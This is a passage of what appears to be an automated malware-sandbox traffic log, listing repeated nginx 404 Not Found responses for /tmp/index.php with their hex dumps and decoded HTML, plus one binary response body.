server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 20:28:54 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 20:28:55 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 20:28:57 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 20:28:58 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 20:28:59 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 20:29:00 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 59 39 08 a5 6c 5f b5 ac 17 bd cf b4 fe 6d 9f 3d d4 a1 72 0a 41 c2 8f 97 cb Data Ascii: #\6Y9l_m=rA
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 20:29:03 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 20:29:04 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 20:29:05 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 20:29:07 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 20:29:08 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 20:29:09 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 20:29:10 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 20:29:11 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 20:29:12 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this 